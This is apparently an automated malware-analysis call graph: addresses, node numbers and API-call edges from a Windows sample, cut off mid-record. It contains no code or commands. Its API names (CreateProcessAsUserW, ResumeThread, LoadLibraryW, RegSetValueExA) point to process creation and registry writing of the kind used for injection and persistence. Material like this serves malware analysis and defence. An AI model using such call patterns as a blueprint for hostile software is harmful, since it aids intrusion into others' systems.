2b27dcd 36481->36482 36482->36441 36483 2b37074 36484 2b14860 11 API calls 36483->36484 36485 2b37095 36484->36485 36486 2b147ec 11 API calls 36485->36486 36487 2b370cc 36486->36487 37304 2b289d0 36487->37304 36490 2b14860 11 API calls 36491 2b37111 36490->36491 36492 2b147ec 11 API calls 36491->36492 36493 2b37148 36492->36493 36494 2b289d0 20 API calls 36493->36494 36495 2b3716c 36494->36495 36496 2b14860 11 API calls 36495->36496 36497 2b3718d 36496->36497 36498 2b147ec 11 API calls 36497->36498 36499 2b371c4 36498->36499 36500 2b289d0 20 API calls 36499->36500 36501 2b371e8 36500->36501 36502 2b14860 11 API calls 36501->36502 36503 2b37209 36502->36503 36504 2b147ec 11 API calls 36503->36504 36505 2b37240 36504->36505 36506 2b289d0 20 API calls 36505->36506 36507 2b37264 36506->36507 36508 2b14860 11 API calls 36507->36508 36509 2b37285 36508->36509 36510 2b147ec 11 API calls 36509->36510 36511 2b372bc 36510->36511 36512 2b289d0 20 API calls 36511->36512 36513 2b372e0 36512->36513 36514 2b14860 11 API calls 36513->36514 36515 2b3731a 36514->36515 37317 2b2e0f8 36515->37317 36517 2b37349 37327 2b2f214 36517->37327 36520 2b14860 11 API calls 36521 2b37399 36520->36521 36522 2b147ec 11 API calls 36521->36522 36523 2b373d0 36522->36523 36524 2b289d0 20 API calls 36523->36524 36525 2b373f4 36524->36525 36526 2b14860 11 API calls 36525->36526 36527 2b37415 36526->36527 36528 2b147ec 11 API calls 36527->36528 36529 2b3744c 36528->36529 36530 2b289d0 20 API calls 36529->36530 36531 2b37470 36530->36531 36532 2b14860 11 API calls 36531->36532 36533 2b37491 36532->36533 36534 2b147ec 11 API calls 36533->36534 36535 2b374c8 36534->36535 36536 2b289d0 20 API calls 36535->36536 36537 2b374ec 36536->36537 36538 2b14860 11 API calls 36537->36538 36539 2b3750d 36538->36539 36540 2b147ec 11 API calls 36539->36540 36541 2b37544 36540->36541 36542 2b289d0 20 API calls 36541->36542 36543 2b37568 36542->36543 36544 2b14860 11 API calls 36543->36544 36545 2b37589 36544->36545 36546 2b147ec 11 API calls 36545->36546 36547 2b375c0 36546->36547 36548 2b289d0 20 API calls 36547->36548 36549 2b375e4 36548->36549 36550 2b14860 11 API calls 36549->36550 36551 2b37605 36550->36551 36552 2b147ec 11 API calls 36551->36552 36553 2b3763c 36552->36553 36554 2b289d0 20 API calls 36553->36554 36555 2b37660 36554->36555 36556 2b14860 11 API calls 36555->36556 36557 2b37681 36556->36557 36558 2b147ec 11 API calls 36557->36558 36559 2b376b8 36558->36559 36560 2b289d0 20 API calls 36559->36560 36561 2b376dc 36560->36561 36562 2b14860 11 API calls 36561->36562 36563 2b376fd 36562->36563 36564 2b147ec 11 API calls 36563->36564 36565 2b37734 36564->36565 36566 2b289d0 20 API calls 36565->36566 36567 2b37758 36566->36567 36568 2b14860 11 API calls 36567->36568 36569 2b37779 36568->36569 36570 2b147ec 11 API calls 36569->36570 36571 2b377b0 36570->36571 36572 2b289d0 20 API calls 36571->36572 36573 2b377d4 36572->36573 36574 2b377e9 36573->36574 36575 2b38318 36573->36575 36576 2b14860 11 API calls 36574->36576 36577 2b14860 11 API calls 36575->36577 36578 2b3780a 36576->36578 36579 2b38339 36577->36579 36580 2b147ec 11 API calls 36578->36580 36581 2b147ec 11 API calls 36579->36581 36582 2b37841 36580->36582 36583 2b38370 36581->36583 36584 2b289d0 20 API calls 36582->36584 36585 2b289d0 20 API calls 36583->36585 36586 2b37865 36584->36586 36587 2b38394 36585->36587 36588 2b14860 11 API calls 36586->36588 36589 2b14860 11 API calls 36587->36589 36590 2b37886 36588->36590 36591 2b383b5 36589->36591 36592 2b147ec 11 API calls 36590->36592 36593 2b147ec 11 API calls 36591->36593 36594 2b378bd 36592->36594 36595 2b383ec 36593->36595 36596 2b289d0 20 API calls 36594->36596 36597 2b289d0 20 API calls 36595->36597 36598 2b378e1 36596->36598 36599 2b38410 36597->36599 36600 2b14860 11 API calls 36598->36600 36601 2b14860 11 API calls 36599->36601 36602 2b37902 36600->36602 36603 2b38431 36601->36603 36604 2b147ec 11 API calls 36602->36604 36605 2b147ec 11 API calls 36603->36605 36606 2b37939 36604->36606 36607 2b38468 36605->36607 36608 2b289d0 20 API calls 36606->36608 36609 2b289d0 20 API calls 36607->36609 36610 2b3795d 36608->36610 36611 2b3848c 36609->36611 36612 2b147ec 11 API calls 36610->36612 36613 2b14860 11 API calls 36611->36613 36614 2b37975 36612->36614 36616 2b384ad 36613->36616 37789 2b285bc 36614->37789 36619 2b147ec 11 API calls 36616->36619 36618 2b14860 11 API calls 36620 2b379a7 36618->36620 36621 2b384e4 36619->36621 36622 2b147ec 11 API calls 36620->36622 36623 2b289d0 20 API calls 36621->36623 36625 2b379de 36622->36625 36624 2b38508 36623->36624 36626 2b393a1 36624->36626 36627 2b3851d 36624->36627 36630 2b289d0 20 API calls 36625->36630 36628 2b14860 11 API calls 36626->36628 36629 2b14860 11 API calls 36627->36629 36634 2b393c2 36628->36634 36631 2b3853e 36629->36631 36632 2b37a02 36630->36632 36635 2b38556 36631->36635 36633 2b14860 11 API calls 36632->36633 36638 2b37a23 36633->36638 36637 2b147ec 11 API calls 36634->36637 36636 2b147ec 11 API calls 36635->36636 36639 2b38575 36636->36639 36641 2b393f9 36637->36641 36640 2b147ec 11 API calls 36638->36640 36642 2b3858d 36639->36642 36646 2b37a5a 36640->36646 36643 2b289d0 20 API calls 36641->36643 36644 2b289d0 20 API calls 36642->36644 36645 2b3941d 36643->36645 36647 2b38599 36644->36647 36648 2b14860 11 API calls 36645->36648 36650 2b289d0 20 API calls 36646->36650 36649 2b14860 11 API calls 36647->36649 36654 2b3943e 36648->36654 36651 2b385ba 36649->36651 36652 2b37a7e 36650->36652 36655 2b385c5 36651->36655 36653 2b14860 11 API calls 36652->36653 36658 2b37a9f 36653->36658 36656 2b147ec 11 API calls 36654->36656 36657 2b147ec 11 API calls 36655->36657 36661 2b39475 36656->36661 36659 2b385f1 36657->36659 36660 2b147ec 11 API calls 36658->36660 36662 2b385fc 36659->36662 36666 2b37ad6 36660->36666 36663 2b289d0 20 API calls 36661->36663 36664 2b289d0 20 API calls 36662->36664 36665 2b39499 36663->36665 36667 2b38615 36664->36667 36668 2b14860 11 API calls 36665->36668 36670 2b289d0 20 API calls 36666->36670 36669 2b14860 11 API calls 36667->36669 36671 2b394ba 36668->36671 36672 2b38636 36669->36672 36673 2b37afa 36670->36673 36674 2b147ec 11 API calls 36671->36674 36675 2b147ec 11 API calls 36672->36675 37801 2b2adf8 29 API calls 36673->37801 36680 2b394f1 36674->36680 36679 2b3866d 36675->36679 36677 2b37b21 36678 2b14860 11 API calls 36677->36678 36683 2b37b42 36678->36683 36681 2b289d0 20 API calls 36679->36681 36682 2b289d0 20 API calls 36680->36682 36684 2b38691 36681->36684 36691 2b39515 36682->36691 36686 2b147ec 11 API calls 36683->36686 36685 2b147ec 11 API calls 36684->36685 36687 2b386bd 36685->36687 36692 2b37b79 36686->36692 36690 2b386d5 36687->36690 36688 2b39cf5 36689 2b14860 11 API calls 36688->36689 36694 2b39d16 36689->36694 36696 2b386e0 CreateProcessAsUserW 36690->36696 36691->36688 36693 2b14860 11 API calls 36691->36693 36695 2b289d0 20 API calls 36692->36695 36704 2b39560 36693->36704 36700 2b147ec 11 API calls 36694->36700 36697 2b37b9d 36695->36697 36698 2b386f2 36696->36698 36699 2b3876e 36696->36699 36702 2b14860 11 API calls 36697->36702 36703 2b14860 11 API calls 36698->36703 36701 2b14860 11 API calls 36699->36701 36708 2b39d4d 36700->36708 36709 2b3878f 36701->36709 36710 2b37bbe 36702->36710 36705 2b38713 36703->36705 36707 2b147ec 11 API calls 36704->36707 36706 2b3871e 36705->36706 36714 2b147ec 11 API calls 36706->36714 36715 2b39597 36707->36715 36711 2b289d0 20 API calls 36708->36711 36712 2b147ec 11 API calls 36709->36712 36713 2b147ec 11 API calls 36710->36713 36716 2b39d71 36711->36716 36722 2b387c6 36712->36722 36723 2b37bf5 36713->36723 36717 2b3874a 36714->36717 36719 2b289d0 20 API calls 36715->36719 36718 2b14860 11 API calls 36716->36718 36720 2b38755 36717->36720 36725 2b39d92 36718->36725 36721 2b395bb 36719->36721 36728 2b289d0 20 API calls 36720->36728 36724 2b14860 11 API calls 36721->36724 36726 2b289d0 20 API calls 36722->36726 36727 2b289d0 20 API calls 36723->36727 36734 2b395dc 36724->36734 36731 2b147ec 11 API calls 36725->36731 36729 2b387ea 36726->36729 36730 2b37c19 36727->36730 36728->36699 36732 2b14860 11 API calls 36729->36732 36733 2b14860 11 API calls 36730->36733 36737 2b39dc9 36731->36737 36738 2b3880b 36732->36738 36736 2b37c3a 36733->36736 36735 2b147ec 11 API calls 36734->36735 36743 2b39613 36735->36743 36741 2b147ec 11 API calls 36736->36741 36739 2b289d0 20 API calls 36737->36739 36740 2b147ec 11 API calls 36738->36740 36742 2b39ded 36739->36742 36747 2b38842 36740->36747 36748 2b37c71 36741->36748 36744 2b14860 11 API calls 36742->36744 36745 2b289d0 20 API calls 36743->36745 36750 2b39e0e 36744->36750 36746 2b39637 36745->36746 36749 2b14860 11 API calls 36746->36749 36751 2b289d0 20 API calls 36747->36751 36752 2b289d0 20 API calls 36748->36752 36756 2b39658 36749->36756 36755 2b147ec 11 API calls 36750->36755 36753 2b38866 36751->36753 36754 2b37c95 36752->36754 36757 2b149f8 11 API calls 36753->36757 36759 2b14860 11 API calls 36754->36759 36762 2b39e45 36755->36762 36760 2b147ec 11 API calls 36756->36760 36758 2b3888a 36757->36758 36763 2b14860 11 API calls 36758->36763 36764 2b37cd5 36759->36764 36761 2b3968f 36760->36761 36769 2b289d0 20 API calls 36761->36769 36765 2b289d0 20 API calls 36762->36765 36766 2b388b9 36763->36766 36768 2b147ec 11 API calls 36764->36768 36771 2b39e69 36765->36771 36767 2b388c4 36766->36767 36773 2b147ec 11 API calls 36767->36773 36777 2b37d0c 36768->36777 36770 2b396b3 36769->36770 37339 2b2f094 36770->37339 36775 2b289d0 20 API calls 36771->36775 36776 2b388f0 36773->36776 36781 2b39e9c 36775->36781 36782 2b388fb 36776->36782 36779 2b289d0 20 API calls 36777->36779 36778 2b14860 11 API calls 36784 2b396f7 36778->36784 36780 2b37d30 36779->36780 36783 2b14860 11 API calls 36780->36783 36786 2b289d0 20 API calls 36781->36786 36785 2b289d0 20 API calls 36782->36785 36790 2b37d51 36783->36790 36788 2b14860 11 API calls 36784->36788 36787 2b38914 36785->36787 36792 2b39ecf 36786->36792 36789 2b14860 11 API calls 36787->36789 36794 2b3972f 36788->36794 36793 2b38935 36789->36793 36791 2b147ec 11 API calls 36790->36791 36798 2b37d88 36791->36798 36795 2b289d0 20 API calls 36792->36795 36796 2b147ec 11 API calls 36793->36796 36797 2b147ec 11 API calls 36794->36797 36799 2b39f02 36795->36799 36802 2b3896c 36796->36802 36801 2b39766 36797->36801 36800 2b289d0 20 API calls 36798->36800 36804 2b289d0 20 API calls 36799->36804 36803 2b37dac 36800->36803 36806 2b289d0 20 API calls 36801->36806 36808 2b289d0 20 API calls 36802->36808 36805 2b14860 11 API calls 36803->36805 36807 2b39f35 36804->36807 36814 2b37dcd 36805->36814 36809 2b3978a 36806->36809 36810 2b14860 11 API calls 36807->36810 36811 2b38990 36808->36811 36812 2b14860 11 API calls 36809->36812 36815 2b39f56 36810->36815 36813 2b14860 11 API calls 36811->36813 36817 2b397ab 36812->36817 36818 2b389b1 36813->36818 36816 2b147ec 11 API calls 36814->36816 36819 2b147ec 11 API calls 36815->36819 36822 2b37e04 36816->36822 36821 2b147ec 11 API calls 36817->36821 36820 2b147ec 11 API calls 36818->36820 36823 2b39f8d 36819->36823 36826 2b389e8 36820->36826 36825 2b397e2 36821->36825 36824 2b289d0 20 API calls 36822->36824 36828 2b289d0 20 API calls 36823->36828 36827 2b37e28 36824->36827 36830 2b289d0 20 API calls 36825->36830 36832 2b289d0 20 API calls 36826->36832 37802 2b25aec 42 API calls 36827->37802 36831 2b39fb1 36828->36831 36834 2b39806 36830->36834 36835 2b14860 11 API calls 36831->36835 36836 2b38a0c 36832->36836 37346 2b17e5c 36834->37346 36847 2b39fd2 36835->36847 37805 2b2d164 23 API calls 36836->37805 36837 2b37e54 36844 2b14bcc 11 API calls 36837->36844 36841 2b38a20 36843 2b14860 11 API calls 36841->36843 36842 2b39aef 36846 2b14860 11 API calls 36842->36846 36851 2b38a46 36843->36851 36848 2b37e69 36844->36848 36845 2b14860 11 API calls 36852 2b39839 36845->36852 36853 2b39b10 36846->36853 36850 2b147ec 11 API calls 36847->36850 36849 2b14860 11 API calls 36848->36849 36855 2b37e8a 36849->36855 36857 2b3a009 36850->36857 36854 2b147ec 11 API calls 36851->36854 36858 2b147ec 11 API calls 36852->36858 36856 2b147ec 11 API calls 36853->36856 36862 2b38a7d 36854->36862 36859 2b147ec 11 API calls 36855->36859 36864 2b39b47 36856->36864 36860 2b289d0 20 API calls 36857->36860 36863 2b39870 36858->36863 36867 2b37ec1 36859->36867 36861 2b3a02d 36860->36861 36865 2b14860 11 API calls 36861->36865 36866 2b289d0 20 API calls 36862->36866 36868 2b289d0 20 API calls 36863->36868 36869 2b289d0 20 API calls 36864->36869 36877 2b3a04e 36865->36877 36870 2b38aa1 36866->36870 36874 2b289d0 20 API calls 36867->36874 36871 2b39894 36868->36871 36872 2b39b6b 36869->36872 36873 2b14860 11 API calls 36870->36873 36875 2b14860 11 API calls 36871->36875 36876 2b14860 11 API calls 36872->36876 36880 2b38ac2 36873->36880 36878 2b37ee5 36874->36878 36882 2b398b5 36875->36882 36883 2b39b8c 36876->36883 36879 2b147ec 11 API calls 36877->36879 36881 2b149f8 11 API calls 36878->36881 36890 2b3a085 36879->36890 36886 2b147ec 11 API calls 36880->36886 36884 2b37f02 36881->36884 36888 2b147ec 11 API calls 36882->36888 36889 2b147ec 11 API calls 36883->36889 37803 2b27e50 17 API calls 36884->37803 36893 2b38af9 36886->36893 36887 2b37f08 36891 2b14860 11 API calls 36887->36891 36894 2b398ec 36888->36894 36895 2b39bc3 36889->36895 36892 2b289d0 20 API calls 36890->36892 36897 2b37f29 36891->36897 36900 2b3a0a9 36892->36900 36896 2b289d0 20 API calls 36893->36896 36898 2b289d0 20 API calls 36894->36898 36899 2b289d0 20 API calls 36895->36899 36901 2b38b1d 36896->36901 36905 2b147ec 11 API calls 36897->36905 36902 2b39910 36898->36902 36903 2b39be7 36899->36903 36908 2b289d0 20 API calls 36900->36908 36904 2b14860 11 API calls 36901->36904 36906 2b14860 11 API calls 36902->36906 36907 2b14860 11 API calls 36903->36907 36909 2b38b3e 36904->36909 36910 2b37f60 36905->36910 36911 2b39931 36906->36911 36912 2b39c08 36907->36912 36913 2b3a0dc 36908->36913 36914 2b147ec 11 API calls 36909->36914 36915 2b289d0 20 API calls 36910->36915 36916 2b147ec 11 API calls 36911->36916 36917 2b147ec 11 API calls 36912->36917 36918 2b289d0 20 API calls 36913->36918 36921 2b38b75 36914->36921 36919 2b37f84 36915->36919 36924 2b39968 36916->36924 36922 2b39c3f 36917->36922 36923 2b3a10f 36918->36923 36920 2b14860 11 API calls 36919->36920 36926 2b37fa5 36920->36926 36925 2b289d0 20 API calls 36921->36925 36928 2b289d0 20 API calls 36922->36928 36929 2b289d0 20 API calls 36923->36929 36927 2b289d0 20 API calls 36924->36927 36930 2b38b99 36925->36930 36935 2b147ec 11 API calls 36926->36935 36931 2b3998c 36927->36931 36932 2b39c63 36928->36932 36942 2b3a142 36929->36942 36933 2b38ba2 36930->36933 36934 2b38bb9 36930->36934 37350 2b2e358 36931->37350 36937 2b14860 11 API calls 36932->36937 37806 2b28730 17 API calls 36933->37806 36939 2b14860 11 API calls 36934->36939 36944 2b37fdc 36935->36944 36946 2b39c84 36937->36946 36948 2b38bda 36939->36948 36941 2b14530 11 API calls 36943 2b399b1 36941->36943 36947 2b289d0 20 API calls 36942->36947 36945 2b14860 11 API calls 36943->36945 36949 2b289d0 20 API calls 36944->36949 36954 2b399d2 36945->36954 36950 2b147ec 11 API calls 36946->36950 36955 2b3a175 36947->36955 36951 2b147ec 11 API calls 36948->36951 36952 2b38000 36949->36952 36958 2b39cbb 36950->36958 36956 2b38c11 36951->36956 36953 2b14860 11 API calls 36952->36953 36960 2b38021 36953->36960 36957 2b147ec 11 API calls 36954->36957 36959 2b289d0 20 API calls 36955->36959 36964 2b289d0 20 API calls 36956->36964 36968 2b39a09 36957->36968 36962 2b289d0 20 API calls 36958->36962 36961 2b3a1a8 36959->36961 36967 2b147ec 11 API calls 36960->36967 36963 2b14860 11 API calls 36961->36963 36965 2b39cdf 36962->36965 36974 2b3a1c9 36963->36974 36966 2b38c35 36964->36966 37370 2b149f8 36965->37370 36970 2b14860 11 API calls 36966->36970 36976 2b38058 36967->36976 36972 2b289d0 20 API calls 36968->36972 36979 2b38c56 36970->36979 36975 2b39a2d 36972->36975 36978 2b147ec 11 API calls 36974->36978 36977 2b14860 11 API calls 36975->36977 36980 2b289d0 20 API calls 36976->36980 36984 2b39a4e 36977->36984 36985 2b3a200 36978->36985 36981 2b147ec 11 API calls 36979->36981 36982 2b3807c 36980->36982 36988 2b38c8d 36981->36988 36983 2b14860 11 API calls 36982->36983 36989 2b3809d 36983->36989 36986 2b147ec 11 API calls 36984->36986 36987 2b289d0 20 API calls 36985->36987 36996 2b39a85 36986->36996 36990 2b3a224 36987->36990 36991 2b289d0 20 API calls 36988->36991 36994 2b147ec 11 API calls 36989->36994 36992 2b14860 11 API calls 36990->36992 36993 2b38cb1 36991->36993 36998 2b3a245 36992->36998 36995 2b14860 11 API calls 36993->36995 36999 2b380d4 36994->36999 37001 2b38cd2 36995->37001 36997 2b289d0 20 API calls 36996->36997 37007 2b39aa9 36997->37007 37000 2b147ec 11 API calls 36998->37000 37002 2b289d0 20 API calls 36999->37002 37006 2b3a27c 37000->37006 37003 2b147ec 11 API calls 37001->37003 37004 2b380f8 37002->37004 37010 2b38d09 37003->37010 37804 2b2b118 39 API calls 37004->37804 37009 2b289d0 20 API calls 37006->37009 37355 2b2dc8c 37007->37355 37015 2b3a2a0 37009->37015 37012 2b289d0 20 API calls 37010->37012 37011 2b38109 37013 2b38d2d ResumeThread 37012->37013 37014 2b14860 11 API calls 37013->37014 37019 2b38d59 37014->37019 37016 2b289d0 20 API calls 37015->37016 37017 2b3a2d3 37016->37017 37018 2b14860 11 API calls 37017->37018 37021 2b3a2f4 37018->37021 37020 2b147ec 11 API calls 37019->37020 37023 2b38d90 37020->37023 37022 2b147ec 11 API calls 37021->37022 37026 2b3a32b 37022->37026 37024 2b289d0 20 API calls 37023->37024 37025 2b38db4 37024->37025 37027 2b14860 11 API calls 37025->37027 37028 2b289d0 20 API calls 37026->37028 37031 2b38dd5 37027->37031 37029 2b3a34f 37028->37029 37030 2b14860 11 API calls 37029->37030 37033 2b3a370 37030->37033 37032 2b147ec 11 API calls 37031->37032 37035 2b38e0c 37032->37035 37034 2b147ec 11 API calls 37033->37034 37038 2b3a3a7 37034->37038 37036 2b289d0 20 API calls 37035->37036 37037 2b38e30 37036->37037 37039 2b14860 11 API calls 37037->37039 37040 2b289d0 20 API calls 37038->37040 37042 2b38e51 37039->37042 37041 2b3a3cb 37040->37041 37043 2b14860 11 API calls 37041->37043 37044 2b147ec 11 API calls 37042->37044 37045 2b3a3ec 37043->37045 37047 2b38e88 37044->37047 37046 2b147ec 11 API calls 37045->37046 37050 2b3a423 37046->37050 37048 2b289d0 20 API calls 37047->37048 37049 2b38eac CloseHandle 37048->37049 37051 2b14860 11 API calls 37049->37051 37052 2b289d0 20 API calls 37050->37052 37053 2b38ed8 37051->37053 37055 2b3a447 37052->37055 37054 2b147ec 11 API calls 37053->37054 37057 2b38f0f 37054->37057 37056 2b289d0 20 API calls 37055->37056 37058 2b3a47a 37056->37058 37059 2b289d0 20 API calls 37057->37059 37061 2b289d0 20 API calls 37058->37061 37060 2b38f33 37059->37060 37062 2b14860 11 API calls 37060->37062 37063 2b3a4ad 37061->37063 37064 2b38f54 37062->37064 37065 2b289d0 20 API calls 37063->37065 37066 2b147ec 11 API calls 37064->37066 37067 2b3a4e0 37065->37067 37068 2b38f8b 37066->37068 37069 2b289d0 20 API calls 37067->37069 37070 2b289d0 20 API calls 37068->37070 37071 2b3a513 37069->37071 37072 2b38faf 37070->37072 37073 2b14860 11 API calls 37071->37073 37074 2b14860 11 API calls 37072->37074 37075 2b3a534 37073->37075 37076 2b38fd0 37074->37076 37077 2b147ec 11 API calls 37075->37077 37078 2b147ec 11 API calls 37076->37078 37080 2b3a56b 37077->37080 37079 2b39007 37078->37079 37082 2b289d0 20 API calls 37079->37082 37081 2b289d0 20 API calls 37080->37081 37083 2b3a58f 37081->37083 37084 2b3902b 37082->37084 37085 2b14860 11 API calls 37083->37085 37086 2b14860 11 API calls 37084->37086 37087 2b3a5b0 37085->37087 37088 2b3904c 37086->37088 37089 2b147ec 11 API calls 37087->37089 37090 2b147ec 11 API calls 37088->37090 37091 2b3a5e7 37089->37091 37092 2b39083 37090->37092 37094 2b289d0 20 API calls 37091->37094 37093 2b289d0 20 API calls 37092->37093 37095 2b390a7 37093->37095 37097 2b3a60b 37094->37097 37096 2b14860 11 API calls 37095->37096 37099 2b390c8 37096->37099 37098 2b289d0 20 API calls 37097->37098 37101 2b3a63e 37098->37101 37100 2b147ec 11 API calls 37099->37100 37103 2b390ff 37100->37103 37102 2b289d0 20 API calls 37101->37102 37107 2b3a671 37102->37107 37104 2b289d0 20 API calls 37103->37104 37105 2b39123 37104->37105 37106 2b14860 11 API calls 37105->37106 37109 2b39144 37106->37109 37108 2b289d0 20 API calls 37107->37108 37110 2b3a6a4 37108->37110 37111 2b147ec 11 API calls 37109->37111 37112 2b289d0 20 API calls 37110->37112 37113 2b3917b 37111->37113 37114 2b3a6d7 37112->37114 37115 2b289d0 20 API calls 37113->37115 37117 2b289d0 20 API calls 37114->37117 37116 2b3919f 37115->37116 37118 2b14860 11 API calls 37116->37118 37119 2b3a70a 37117->37119 37121 2b391c0 37118->37121 37120 2b14860 11 API calls 37119->37120 37122 2b3a72b 37120->37122 37123 2b147ec 11 API calls 37121->37123 37124 2b147ec 11 API calls 37122->37124 37125 2b391f7 37123->37125 37126 2b3a762 37124->37126 37127 2b289d0 20 API calls 37125->37127 37129 2b289d0 20 API calls 37126->37129 37128 2b3921b 37127->37128 37807 2b2894c LoadLibraryW 37128->37807 37130 2b3a786 37129->37130 37131 2b14860 11 API calls 37130->37131 37136 2b3a7a7 37131->37136 37134 2b2894c 21 API calls 37135 2b3924e 37134->37135 37137 2b2894c 21 API calls 37135->37137 37139 2b147ec 11 API calls 37136->37139 37138 2b39262 37137->37138 37140 2b2894c 21 API calls 37138->37140 37144 2b3a7de 37139->37144 37141 2b39276 37140->37141 37142 2b2894c 21 API calls 37141->37142 37143 2b3928a 37142->37143 37145 2b2894c 21 API calls 37143->37145 37147 2b289d0 20 API calls 37144->37147 37146 2b3929e CloseHandle 37145->37146 37148 2b14860 11 API calls 37146->37148 37149 2b3a802 37147->37149 37151 2b392ca 37148->37151 37150 2b14860 11 API calls 37149->37150 37153 2b3a823 37150->37153 37152 2b147ec 11 API calls 37151->37152 37155 2b39301 37152->37155 37154 2b147ec 11 API calls 37153->37154 37156 2b3a85a 37154->37156 37157 2b289d0 20 API calls 37155->37157 37159 2b289d0 20 API calls 37156->37159 37158 2b39325 37157->37158 37160 2b14860 11 API calls 37158->37160 37161 2b3a87e 37159->37161 37163 2b39346 37160->37163 37162 2b14860 11 API calls 37161->37162 37164 2b3a89f 37162->37164 37165 2b147ec 11 API calls 37163->37165 37166 2b147ec 11 API calls 37164->37166 37167 2b3937d 37165->37167 37168 2b3a8d6 37166->37168 37169 2b289d0 20 API calls 37167->37169 37170 2b289d0 20 API calls 37168->37170 37169->36626 37171 2b3a8fa 37170->37171 37172 2b14860 11 API calls 37171->37172 37173 2b3a91b 37172->37173 37174 2b147ec 11 API calls 37173->37174 37175 2b3a952 37174->37175 37176 2b289d0 20 API calls 37175->37176 37177 2b3a976 37176->37177 37178 2b289d0 20 API calls 37177->37178 37179 2b3a985 37178->37179 37180 2b289d0 20 API calls 37179->37180 37181 2b3a994 37180->37181 37182 2b289d0 20 API calls 37181->37182 37183 2b3a9a3 37182->37183 37184 2b289d0 20 API calls 37183->37184 37185 2b3a9b2 37184->37185 37186 2b289d0 20 API calls 37185->37186 37187 2b3a9c1 37186->37187 37188 2b289d0 20 API calls 37187->37188 37189 2b3a9d0 37188->37189 37190 2b289d0 20 API calls 37189->37190 37191 2b3a9df 37190->37191 37192 2b289d0 20 API calls 37191->37192 37193 2b3a9ee 37192->37193 37194 2b289d0 20 API calls 37193->37194 37195 2b3a9fd 37194->37195 37196 2b289d0 20 API calls 37195->37196 37197 2b3aa0c 37196->37197 37198 2b289d0 20 API calls 37197->37198 37199 2b3aa1b 37198->37199 37200 2b289d0 20 API calls 37199->37200 37201 2b3aa2a 37200->37201 37202 2b289d0 20 API calls 37201->37202 37203 2b3aa39 37202->37203 37204 2b289d0 20 API calls 37203->37204 37205 2b3aa48 37204->37205 37206 2b289d0 20 API calls 37205->37206 37207 2b3aa57 37206->37207 37208 2b14860 11 API calls 37207->37208 37209 2b3aa78 37208->37209 37210 2b147ec 11 API calls 37209->37210 37211 2b3aaaf 37210->37211 37212 2b289d0 20 API calls 37211->37212 37213 2b3aad3 37212->37213 37214 2b289d0 20 API calls 37213->37214 37215 2b3ab06 37214->37215 37216 2b289d0 20 API calls 37215->37216 37217 2b3ab39 37216->37217 37218 2b289d0 20 API calls 37217->37218 37219 2b3ab6c 37218->37219 37220 2b289d0 20 API calls 37219->37220 37221 2b3ab9f 37220->37221 37222 2b289d0 20 API calls 37221->37222 37223 2b3abd2 37222->37223 37224 2b289d0 20 API calls 37223->37224 37225 2b3ac05 37224->37225 37226 2b289d0 20 API calls 37225->37226 37227 2b3ac38 37226->37227 37228 2b14860 11 API calls 37227->37228 37229 2b3ac59 37228->37229 37230 2b147ec 11 API calls 37229->37230 37231 2b3ac90 37230->37231 37232 2b289d0 20 API calls 37231->37232 37233 2b3acb4 37232->37233 37234 2b14860 11 API calls 37233->37234 37235 2b3acd5 37234->37235 37236 2b147ec 11 API calls 37235->37236 37237 2b3ad0c 37236->37237 37238 2b289d0 20 API calls 37237->37238 37239 2b3ad30 37238->37239 37240 2b14860 11 API calls 37239->37240 37241 2b3ad51 37240->37241 37242 2b147ec 11 API calls 37241->37242 37243 2b3ad88 37242->37243 37244 2b289d0 20 API calls 37243->37244 37245 2b3adac 37244->37245 37246 2b289d0 20 API calls 37245->37246 37247 2b3addf 37246->37247 37248 2b289d0 20 API calls 37247->37248 37249 2b3ae12 37248->37249 37250 2b289d0 20 API calls 37249->37250 37251 2b3ae45 37250->37251 37252 2b289d0 20 API calls 37251->37252 37253 2b3ae78 37252->37253 37254 2b289d0 20 API calls 37253->37254 37255 2b3aeab 37254->37255 37256 2b289d0 20 API calls 37255->37256 37257 2b3aede 37256->37257 37258 2b289d0 20 API calls 37257->37258 37259 2b3af11 37258->37259 37260 2b289d0 20 API calls 37259->37260 37261 2b3af44 37260->37261 37262 2b289d0 20 API calls 37261->37262 37263 2b3af77 37262->37263 37264 2b289d0 20 API calls 37263->37264 37265 2b3afaa 37264->37265 37266 2b289d0 20 API calls 37265->37266 37267 2b3afdd 37266->37267 37268 2b289d0 20 API calls 37267->37268 37269 2b3b010 37268->37269 37270 2b289d0 20 API calls 37269->37270 37271 2b3b043 37270->37271 37272 2b289d0 20 API calls 37271->37272 37273 2b3b076 37272->37273 37274 2b289d0 20 API calls 37273->37274 37275 2b3b0a9 37274->37275 37276 2b289d0 20 API calls 37275->37276 37277 2b3b0dc 37276->37277 37278 2b289d0 20 API calls 37277->37278 37279 2b3b10f 37278->37279 37280 2b289d0 20 API calls 37279->37280 37281 2b3b142 37280->37281 37282 2b289d0 20 API calls 37281->37282 37283 2b3b175 37282->37283 37777 2b28338 37283->37777 37286 2b14860 11 API calls 37287 2b3b1a5 37286->37287 37288 2b147ec 11 API calls 37287->37288 37289 2b3b1dc 37288->37289 37290 2b289d0 20 API calls 37289->37290 37291 2b3b200 37290->37291 37292 2b14860 11 API calls 37291->37292 37293 2b3b221 37292->37293 37294 2b147ec 11 API calls 37293->37294 37295 2b3b258 37294->37295 37296 2b289d0 20 API calls 37295->37296 37297 2b3b27c 37296->37297 37298 2b14860 11 API calls 37297->37298 37299 2b3b29d 37298->37299 37300 2b147ec 11 API calls 37299->37300 37301 2b3b2d4 37300->37301 37302 2b289d0 20 API calls 37301->37302 37303 2b3b2f8 ExitProcess 37302->37303 37305 2b289e4 37304->37305 37306 2b281cc 17 API calls 37305->37306 37307 2b28a1d 37306->37307 37308 2b28274 15 API calls 37307->37308 37309 2b28a36 37308->37309 37310 2b27d78 18 API calls 37309->37310 37311 2b28a95 37310->37311 37312 2b28338 18 API calls 37311->37312 37313 2b28aa4 FreeLibrary 37312->37313 37314 2b28abc 37313->37314 37315 2b14500 11 API calls 37314->37315 37316 2b28ac9 37315->37316 37316->36490 37324 2b2e114 37317->37324 37318 2b2e197 37319 2b144dc 11 API calls 37318->37319 37321 2b2e19f 37319->37321 37320 2b149f8 11 API calls 37320->37324 37322 2b14530 11 API calls 37321->37322 37323 2b2e1aa 37322->37323 37325 2b14500 11 API calls 37323->37325 37324->37318 37324->37320 37326 2b2e1c4 37325->37326 37326->36517 37328 2b2f22b 37327->37328 37329 2b2f256 RegOpenKeyA 37328->37329 37330 2b2f264 37329->37330 37331 2b149f8 11 API calls 37330->37331 37332 2b2f27c 37331->37332 37333 2b2f289 RegSetValueExA RegCloseKey 37332->37333 37334 2b2f2ad 